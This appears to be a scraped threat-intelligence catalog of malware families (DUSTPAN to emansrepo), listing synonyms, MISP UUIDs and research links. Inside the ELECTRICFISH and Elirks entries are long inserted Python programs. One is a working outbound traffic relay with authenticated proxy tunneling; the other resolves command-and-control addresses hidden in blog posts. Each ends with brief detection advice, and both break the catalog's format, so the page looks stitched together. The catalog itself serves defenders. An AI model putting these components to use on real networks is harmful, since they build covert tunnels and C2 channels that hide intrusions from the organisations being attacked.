- https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/ - webarchive
- https://swapcontext.blogspot.com/2020/01/dustman-apt-art-of-copy-paste.html - webarchive
- https://twitter.com/Irfan_Asrar/status/1213544175355908096 - webarchive
- https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DUSTPAN
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DUSTPAN.
Known Synonyms |
---|
StealthVector |
Internal MISP references
UUID c91fb5fa-e682-44c7-8782-70068cb68b24
which can be used as unique global reference for DUSTPAN
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dustpan - webarchive
- https://www.volexity.com/blog/2024/08/02/stormbamboo-compromises-isp-to-abuse-insecure-software-update-mechanisms/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/earth-baku-returns - webarchive
- https://www.lac.co.jp/lacwatch/report/20210521_002618.html - webarchive
- https://www.trendmicro.com/en_us/research/24/h/earth-baku-latest-campaign.html - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf - webarchive
- https://www.zscaler.com/blogs/security-research/dodgebox-deep-dive-updated-arsenal-apt41-part-1 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DUSTTRAP
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DUSTTRAP.
Known Synonyms |
---|
CurveLoad |
DodgeBox |
StealthReacher |
Internal MISP references
UUID cbe10c59-5a0f-4d21-abef-59f4fffe8292
which can be used as unique global reference for DUSTTRAP
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Duuzer
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Duuzer.
Known Synonyms |
---|
Escad |
Internal MISP references
UUID a5eb921e-17db-46de-a907-09f9ad05a7d7
which can be used as unique global reference for Duuzer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.duuzer - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/nickel-academy - webarchive
- https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=5b9850b9-0fdd-48a9-b595-9234207ae7df&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments - webarchive
- https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DYEPACK
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular DYEPACK.
Known Synonyms |
---|
BanSwift |
swift |
Internal MISP references
UUID 8420653b-1412-45a1-9a2d-6aa9b9eaf906
which can be used as unique global reference for DYEPACK
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dyepack - webarchive
- https://web.archive.org/web/20160527050022/https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks - webarchive
- https://github.com/649/APT38-DYEPACK - webarchive
- https://media.ccc.de/v/froscon2021-2670-der_cyber-bankraub_von_bangladesch - webarchive
- https://www.anomali.com/blog/evidence-of-stronger-ties-between-north-korea-and-swift-banking-attacks - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://securelist.com/blog/sas/77908/lazarus-under-the-hood/ - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://securelist.com/lazarus-under-the-hood/77908/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DynamicStealer
Dynamic Stealer is a GitHub project written in C# by L1ghtN4n. The code collects passwords and uploads them to Telegram. According to Cyble, Eternity Stealer leverages code from this project, and Jester Stealer could be a rebranding of it.
Internal MISP references
UUID b8b7b6e3-eef1-43cb-a251-e20a3e57d75e
which can be used as unique global reference for DynamicStealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dyre
The Dyre Banking Trojan, discovered in June 2014, targets online banking websites for credential theft and fraud. It uses a man-in-the-browser approach, encryption, and spam emails for distribution.
Dyre's architecture includes a dropper and main DLL module, with techniques for persistence and evasion. Its command and control infrastructure is hidden through proxies, and it can adapt using a domain generation algorithm and I2P integration. Researchers have linked Dyre to the Gozi and Neverquest families.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dyre.
Known Synonyms |
---|
Dyreza |
Internal MISP references
UUID 1ecbcd20-f238-47ef-874b-08ef93266395
which can be used as unique global reference for Dyre
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.dyre - webarchive
- https://blog.malwarebytes.com/threat-analysis/2015/11/a-technical-look-at-dyreza/ - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree - webarchive
- https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/evolution-of-malware-sandbox-evasion-tactics-a-retrospective-study/ - webarchive
- https://www.blueliv.com/downloads/documentation/reports/Network_insights_of_Dyre_and_Dridex_Trojan_bankers.pdf - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-blackburn - webarchive
- https://www.fireeye.com/blog/threat-research/2015/07/dyre_banking_trojan.html - webarchive
- https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group - webarchive
- https://www.forbes.com/sites/thomasbrewster/2017/05/04/dyre-hackers-stealing-millions-from-american-coporates - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-blackburn - webarchive
- https://research.checkpoint.com/2020/graphology-of-an-exploit-playbit/ - webarchive
- https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/ - webarchive
- https://www.secureworks.com/research/dyre-banking-trojan - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EagerBee
According to Elastic, EagerBee loads additional capabilities using remotely downloaded PE files hosted on its C2. However, its implementation and coding practices reveal a lack of advanced skills on the author's part, relying on basic techniques. During their research, they identified string formatting and underlying behavior that align with previous research attributed to a Chinese-speaking threat actor referred to as LuckyMouse (APT27, EmissaryPanda).
Internal MISP references
UUID 20615110-ec2a-4ead-a7e4-cadecf1fa6bc
which can be used as unique global reference for EagerBee
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EagleMonitorRAT
This RAT, written in C#, was derived from HorusEyesRat. It was modified by "Arsium" and published on GitHub, and a client builder is included. GitHub source: https://github.com/arsium/EagleMonitorRAT
Internal MISP references
UUID c2839018-3e2a-44ac-9ad6-60dbc0973918
which can be used as unique global reference for EagleMonitorRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EASYNIGHT
FireEye describes EASYNIGHT as a loader observed in use with several malware families, including HIGHNOON and HIGHNOON.LITE. The loader often acts as a persistence mechanism via search order hijacking.
Examples include a patched bcrypt.dll with no modification other than an additional import entry, in the observed case "printwin.dll!gzwrite64", which breaks the file signature.
Internal MISP references
UUID 0277b1e5-ea2d-4dec-bbaa-13e25a2d1f1c
which can be used as unique global reference for EASYNIGHT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Easy Stealer
Easy Stealer is a new information stealer written in Golang that is under active development. Since July 2023, the information stealer has been sold on the underground market, advertising a variety of capabilities, such as the ability to target crypto wallets and passwords. Based on VirusTotal data, it appears that developer test samples were uploaded in June 2023. The panel for the stealer is installed on the buyer's own infrastructure, allowing for exclusive control. The stated pricing models are: $35 for 7 days, $115 for 30 days, and $250 for 90 days. Given its user-friendly panel design and affordable price range, combined with capabilities similar to other information stealers, Easy Stealer is likely to see an increase in distribution among various cyber criminals as its active development continues.
Internal MISP references
UUID 200c9845-b1d0-4197-85df-b0a9cb78ef6e
which can be used as unique global reference for Easy Stealer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Echelon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Echelon.
Known Synonyms |
---|
Echelon-Stealer |
Internal MISP references
UUID e13ae741-a9fe-47f1-8016-e70c9fa7048e
which can be used as unique global reference for Echelon
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EDA2
EDA2 is a successor of HiddenTear. Just like HiddenTear, it was developed as an open-source project by a security researcher and published on GitHub. It was meant as "educational ransomware" and purposefully had flaws in the encryption process that allow decryption of ransomed files.
This backfired when threat actors began to modify the HiddenTear and EDA2 source code. Some modifications introduced bugs where encrypted files were destroyed; others fixed the encryption flaws and made decryption without a key impossible.
Internal MISP references
UUID 24fe5fef-6325-4c21-9c35-a0ecd185e254
which can be used as unique global reference for EDA2
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.eda2_ransom - webarchive
- https://twitter.com/JaromirHorejsi/status/815861135882780673 - webarchive
- https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/ - webarchive
- https://utkusen.com/blog/im-sorry-for-hidden-tear-eda2 - webarchive
- https://www.bleepingcomputer.com/news/security/hidden-tear-ransomware-developer-blackmailed-by-malware-developers-using-his-code/ - webarchive
- https://github.com/utkusen/eda2 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EDRSilencer
Trend Micro describes EDRSilencer as a red team tool originally designed to interfere with endpoint detection and response solutions via the Windows Filtering Platform, which is actively being used by threat actors.
Internal MISP references
UUID 55108ee8-79c9-4ba7-9725-ec97f0b5293b
which can be used as unique global reference for EDRSilencer
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Egregor
According to Heimdal, an Egregor ransomware infection starts with a loader, which then enables the Remote Desktop Protocol in the victim’s firewall. From there the malware moves laterally inside the victim’s network, identifying and disabling any antivirus software it finds. It then encrypts the data and drops a ransom note named “RECOVER-FILES.txt” in every compromised folder.
Internal MISP references
UUID cd84bc53-8684-4921-89c7-2cf49512bf61
which can be used as unique global reference for Egregor
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.egregor - webarchive
- https://blog.bushidotoken.net/2022/05/gamer-cheater-hacker-spy.html - webarchive
- https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3 - webarchive
- https://www.bleepingcomputer.com/news/security/retail-giant-cencosud-hit-by-egregor-ransomware-attack-stores-impacted/ - webarchive
- https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf - webarchive
- https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/ - webarchive
- https://www.bleepingcomputer.com/news/security/translink-confirms-ransomware-data-theft-still-restoring-systems/ - webarchive
- https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf - webarchive
- https://id-ransomware.blogspot.com/2020/09/egregor-ransomware.html - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-007/ - webarchive
- https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html - webarchive
- https://www.hornetsecurity.com/en/threat-research/qakbot-reducing-its-on-disk-artifacts/ - webarchive
- https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/ - webarchive
- https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/ - webarchive
- https://blog.minerva-labs.com/egregor-ransomware-an-in-depth-analysis - webarchive
- https://securelist.com/targeted-ransomware-encrypting-data/99255/ - webarchive
- https://securityboulevard.com/2020/10/egregor-sekhmets-cousin/ - webarchive
- https://www.appgate.com/news-press/appgate-labs-analyzes-new-family-of-ransomware-egregor - webarchive
- https://areteir.com/wp-content/uploads/2021/01/01182021_Egregor_Insight.pdf - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.justice.gov/opa/pr/foreign-national-pleads-guilty-role-cybercrime-schemes-involving-tens-millions-dollars - webarchive
- https://web.archive.org/web/20201207094648/https://go.group-ib.com/rs/689-LRE-818/images/Group-IB_Egregor_Ransomware.pdf - webarchive
- https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/ - webarchive
- https://www.bleepingcomputer.com/news/security/largest-global-staffing-agency-randstad-hit-by-egregor-ransomware/ - webarchive
- https://twitter.com/redcanary/status/1334224861628039169 - webarchive
- https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-1203.pdf - webarchive
- https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/ - webarchive
- https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html - webarchive
- https://ssu.gov.ua/en/novyny/sbu-zablokuvala-diialnist-transnatsionalnoho-khakerskoho-uhrupovannia - webarchive
- https://www.bleepingcomputer.com/news/security/kmart-nationwide-retailer-suffers-a-ransomware-attack/ - webarchive
- https://www.trendmicro.com/en_us/research/21/c/egregor-ransomware-cartel-members-arrested.html - webarchive
- https://blog.malwarebytes.com/ransomware/2020/12/threat-profile-egregor-ransomware-is-making-a-name-for-itself/ - webarchive
- https://securityintelligence.com/posts/egregor-ransomware-negotiations-uncovered/ - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/ransomware-dev-releases-egregor-maze-master-decryption-keys/ - webarchive
- https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/lockbit-ransomware-now-encrypts-windows-domains-using-group-policies/ - webarchive
- https://www.bleepingcomputer.com/news/security/crytek-confirms-egregor-ransomware-attack-customer-data-theft/ - webarchive
- https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://therecord.media/frances-lead-cybercrime-investigator-on-the-egregor-arrests-cybercrime/ - webarchive
- https://www.bleepingcomputer.com/news/security/barnes-and-noble-hit-by-egregor-ransomware-strange-data-leaked/ - webarchive
- https://www.intrinsec.com/egregor-prolock/ - webarchive
- https://www.group-ib.com/blog/egregor - webarchive
- https://news.sophos.com/en-us/2020/12/08/egregor-ransomware-mazes-heir-apparent/ - webarchive
- https://www.morphisec.com/hubfs/eBooks_and_Whitepapers/EGREGOR%20REPORT%20WEB%20FINAL.pdf - webarchive
- https://www.trendmicro.com/en_us/research/20/l/egregor-ransomware-launches-string-of-high-profile-attacks-to-en.html - webarchive
- https://www.bleepingcomputer.com/news/security/zeus-icedid-malware-gangs-leader-pleads-guilty-faces-40-years-in-prison/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware - webarchive
- https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion - webarchive
- https://intel471.com/blog/egregor-arrests-ukraine-sbu-maze-ransomware - webarchive
- https://www.bleepingcomputer.com/news/security/maze-ransomware-is-shutting-down-its-cybercrime-operation/ - webarchive
- https://www.bleepingcomputer.com/news/security/metro-vancouvers-transit-system-hit-by-egregor-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/ - webarchive
- https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/ - webarchive
- https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel - webarchive
- https://blog.emsisoft.com/en/37810/ransomware-profile-egregor/ - webarchive
- https://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/ - webarchive
- https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware - webarchive
- https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide - webarchive
- https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware - webarchive
- https://www.zdnet.com/article/ubisoft-crytek-data-posted-on-ransomware-gangs-site/ - webarchive
- https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone/ - webarchive
- https://securityaffairs.co/wordpress/127826/malware/egregor-sekhmet-decryption-keys.html - webarchive
- https://unit42.paloaltonetworks.com/egregor-ransomware-courses-of-action/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
EHDevel
Internal MISP references
UUID 257da597-7e6d-4405-9b10-b4206bb013ca
which can be used as unique global reference for EHDevel
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.ehdevel - webarchive
- https://www.bitdefender.com/blog/labs/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/ - webarchive
- https://labs.bitdefender.com/2017/09/ehdevel-the-story-of-a-continuously-improving-advanced-threat-creation-toolkit/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ekipa RAT
Internal MISP references
UUID 791a0902-7541-444a-a75e-19be97545917
which can be used as unique global reference for Ekipa RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ELECTRICFISH
The application is a command-line utility and its primary purpose is to tunnel traffic between two IP addresses. The application accepts command-line arguments allowing it to be configured with a destination IP address and port, a source IP address and port, a proxy IP address and port, and a user name and password, which can be utilized to authenticate with a proxy server. It will attempt to establish TCP sessions with the source IP address and the destination IP address. If a connection is made to both the source and destination IPs, this malicious utility will implement a custom protocol, which will allow traffic to rapidly and efficiently be tunneled between two machines. If necessary, the malware can authenticate with a proxy to be able to reach the destination IP address. A configured proxy server is not required for this utility.
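The relay mechanics the description above lays out, as an added example that is not ELECTRICFISH's own code: the tool dials *out* to both the source and the destination and copies bytes between the two sessions, optionally reaching the destination through an authenticating proxy. The page does not say which proxy protocol or framing the real tool uses, so this example assumes an HTTP CONNECT proxy with Basic authentication and no custom framing; `loopback_demo()` uses constructed local listeners in place of real peers so it runs offline.

```python
import base64
import socket
import threading


def connect_status_ok(status_line):
    """True when an HTTP CONNECT status line reports success (2xx)."""
    parts = status_line.split()
    return len(parts) >= 2 and parts[1].isdigit() and parts[1].startswith(b"2")


def connect_via_proxy(proxy, target, username=None, password=None, timeout=5.0):
    """Reach `target` through an HTTP CONNECT proxy (assumed proxy type, not
    documented for ELECTRICFISH). Credentials go out as Proxy-Authorization: Basic."""
    sock = socket.create_connection(proxy, timeout=timeout)
    host, port = target
    request = f"CONNECT {host}:{port} HTTP/1.1\r\nHost: {host}:{port}\r\n"
    if username is not None:
        token = base64.b64encode(f"{username}:{password}".encode()).decode()
        request += f"Proxy-Authorization: Basic {token}\r\n"
    sock.sendall((request + "\r\n").encode())
    response = b""
    while b"\r\n\r\n" not in response:  # read status line plus headers
        chunk = sock.recv(4096)
        if not chunk:
            sock.close()
            raise ConnectionError("proxy closed the connection during CONNECT")
        response += chunk
    status_line = response.split(b"\r\n", 1)[0]
    if not connect_status_ok(status_line):
        sock.close()
        raise ConnectionError(f"proxy refused CONNECT: {status_line!r}")
    return sock


def _pump(src, dst):
    """Copy bytes src -> dst until src sends EOF, then half-close dst so the
    EOF propagates to the far peer instead of leaving it hanging."""
    try:
        while True:
            data = src.recv(65536)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def relay(source, destination, proxy=None, username=None, password=None, timeout=5.0):
    """Dial out to both endpoints and shuttle traffic until both sides close.
    Both legs are outbound, which is what lets this class of tool work from a
    host that only permits egress; the proxy, if any, is only used for the
    destination leg."""
    src_sock = socket.create_connection(source, timeout=timeout)
    if proxy is not None:
        dst_sock = connect_via_proxy(proxy, destination, username, password, timeout)
    else:
        dst_sock = socket.create_connection(destination, timeout=timeout)
    src_sock.settimeout(None)
    dst_sock.settimeout(None)
    pumps = [threading.Thread(target=_pump, args=(src_sock, dst_sock)),
             threading.Thread(target=_pump, args=(dst_sock, src_sock))]
    for t in pumps:
        t.start()
    for t in pumps:
        t.join()
    src_sock.close()
    dst_sock.close()


def _recv_until_eof(sock):
    buf = b""
    while True:
        chunk = sock.recv(4096)
        if not chunk:
            return buf
        buf += chunk


def loopback_demo():
    """Run the relay between two constructed local listeners standing in for the
    'source' and 'destination' peers; returns what each peer received."""
    listeners = []
    for _ in range(2):
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        listener.bind(("127.0.0.1", 0))
        listener.listen(1)
        listeners.append(listener)
    src_listener, dst_listener = listeners
    worker = threading.Thread(target=relay,
                              args=(src_listener.getsockname(), dst_listener.getsockname()))
    worker.start()
    src_peer, _ = src_listener.accept()  # the relay dials the 'source' first
    dst_peer, _ = dst_listener.accept()  # then the 'destination'
    src_peer.sendall(b"hello from source")
    src_peer.shutdown(socket.SHUT_WR)    # EOF travels through the relay
    seen_at_dst = _recv_until_eof(dst_peer)
    dst_peer.sendall(b"reply from destination")
    dst_peer.shutdown(socket.SHUT_WR)
    seen_at_src = _recv_until_eof(src_peer)
    worker.join()
    for s in (src_peer, dst_peer, src_listener, dst_listener):
        s.close()
    return seen_at_dst, seen_at_src
```

For detection the useful property is that neither leg is a listening socket: look for one process holding two long-lived outbound TCP sessions whose byte counts mirror each other, or a CONNECT through the corporate proxy to an address that is not a web service.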
Internal MISP references
UUID 0f5a2ce1-b44f-4088-a4c0-04456a90c174
which can be used as unique global reference for ELECTRICFISH
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.electricfish - webarchive
- https://www.us-cert.gov/ncas/analysis-reports/AR19-129A - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
- https://adeo.com.tr/wp-content/uploads/2020/05/ADEO-Lazarus-APT38.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ElectricPowder
Internal MISP references
UUID 31b18d64-815c-4464-8fcc-f084953a75f5
which can be used as unique global reference for ElectricPowder
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Elirks
Elirks is a basic backdoor Trojan, first discovered in 2010, that is primarily used to steal information from compromised systems. Most attacks using Elirks occur in East Asia. One of the unique features of the malware is that it retrieves its C2 address by accessing a pre-determined microblog service or SNS. Attackers create accounts on those services and post encoded IP addresses or domain names of the real C2 servers in advance of distributing the backdoor. Multiple Elirks variants have used Japanese blog services over the last couple of years.
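The dead-drop lookup described above, as an added example that is not Elirks code: the backdoor reads public posts from a legitimate blog service and decodes the real C2 endpoint from them. The `[[c2:...]]` marker, the base64 encoding and the sample posts are constructed assumptions (the page does not document the actual Elirks encoding); the point is the resolver logic, which skips decoy or malformed posts, validates what it decodes, and takes the newest clean endpoint.

```python
import base64
import ipaddress
import re

# Assumed encoding: base64(host:port) wrapped in a fixed marker inside an
# otherwise innocuous post. The real Elirks scheme is not given on the page.
MARKER = re.compile(r"\[\[c2:([A-Za-z0-9+/=]+)\]\]")
HOSTNAME = re.compile(r"^(?=.{1,253}$)([a-z0-9-]{1,63}\.)+[a-z]{2,63}$", re.I)

# Constructed sample posts as (timestamp, body). The newest post is a decoy
# that decodes to a non-endpoint; the oldest points at a stale C2 domain.
SAMPLE_POSTS = [
    ("2016-03-01T09:00:00", "Nice weather in Tokyo today! [[c2:MjAzLjAuMTEzLjU6NDQz]]"),
    ("2016-03-05T12:00:00", "Lunch photo [[c2:aGVsbG8=]]"),
    ("2016-02-20T08:00:00", "Old post [[c2:YzIuZXhhbXBsZS5uZXQ6ODA4MA==]]"),
]


def decode_endpoint(token):
    """Decode one marker payload into (host, port), or None when it is not a
    well-formed endpoint (bad base64, missing port, port out of range, host
    neither an IP address nor a plausible DNS name)."""
    try:
        text = base64.b64decode(token, validate=True).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return None
    host, sep, port = text.rpartition(":")
    if not sep or not port.isdigit() or not 1 <= int(port) <= 65535:
        return None
    try:
        ipaddress.ip_address(host)
    except ValueError:
        if not HOSTNAME.match(host):
            return None
    return host, int(port)


def resolve_c2(posts):
    """Scan posts newest-first and return the first endpoint that decodes
    cleanly, so the operator can rotate C2 by simply posting again and a
    corrupted or decoy post does not break the lookup. Returns None when no
    post yields a usable endpoint."""
    for _, body in sorted(posts, key=lambda post: post[0], reverse=True):
        for token in MARKER.findall(body):
            endpoint = decode_endpoint(token)
            if endpoint is not None:
                return endpoint
    return None


if __name__ == "__main__":
    print(resolve_c2(SAMPLE_POSTS))
```

For a defender the blog host looks benign in proxy logs, so blocking it is neither practical nor sufficient; the workable signal is process-level attribution: a non-browser process fetching a fixed profile page shortly after start-up and then opening a session to an unrelated address that appears nowhere in the page's links.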
Internal MISP references
UUID eb189fd3-ca39-4bc7-be2d-4ea9e89d9ab9
which can be used as unique global reference for Elirks
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.elirks - webarchive
- https://unit42.paloaltonetworks.com/unit42-tracking-elirks-variants-in-japan-similarities-to-previous-attacks/ - webarchive
- https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Elise
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Elise.
Known Synonyms |
---|
EVILNEST |
Internal MISP references
UUID 3477a25d-e04b-475e-8330-39f66c10cc01
which can be used as unique global reference for Elise
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.elise - webarchive
- https://securelist.com/blog/research/70726/the-spring-dragon-apt/ - webarchive
- https://web.archive.org/web/20200509171721/https://raw.githubusercontent.com/fdiskyou/threat-INTel/master/2015/GlobalThreatIntelReport.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2016/02/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/ - webarchive
- https://www.fireeye.com/blog/threat-research/2020/04/code-grafting-to-unpack-malware-in-emulation.html - webarchive
- https://www.secureworks.com/research/threat-profiles/bronze-elgin - webarchive
- https://www.joesecurity.org/blog/8409877569366580427 - webarchive
- https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries - webarchive
- https://www.accenture.com/t20180127T003755Z__w__/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf - webarchive
- https://documents.trendmicro.com/assets/threat-reports/rpt-1h-2014-targeted-attack-trends-in-asia-pacific.pdf - webarchive
- https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ElizaRAT
Internal MISP references
UUID c13fc723-0fd8-4e27-b1d7-a71976ad0268
which can be used as unique global reference for ElizaRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
El Machete APT Backdoor Dropper
This dropper masquerades as Adobe software, named Adobe.msi. It is used to execute the Python-based backdoor used by this threat actor.
Internal MISP references
UUID 66b8cbdc-6190-4568-b615-0ae8a51d2148
which can be used as unique global reference for El Machete APT Backdoor Dropper
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ELMER
ELMER is a non-persistent proxy-aware HTTP backdoor written in Delphi, and is capable of performing file uploads and downloads, file execution, and process and directory listings. To retrieve commands, ELMER sends HTTP GET requests to a hard-coded CnC server, and parses the HTTP response packets received from the CnC server for an integer string corresponding to the command that needs to be executed.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ELMER.
Known Synonyms |
---|
Elmost |
Internal MISP references
UUID e0a8bb01-f0c8-4e2c-bd1e-4c84135ba834
which can be used as unique global reference for ELMER
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.elmer - webarchive
- https://attack.mitre.org/software/S0064 - webarchive
- https://www.symantec.com/security-center/writeup/2015-122210-5724-99 - webarchive
- https://cybergeeks.tech/a-detailed-analysis-of-elmer-backdoor-used-by-apt16/ - webarchive
- https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html - webarchive
- https://attack.mitre.org/groups/G0023 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
emansrepo
Infostealer
Internal MISP references
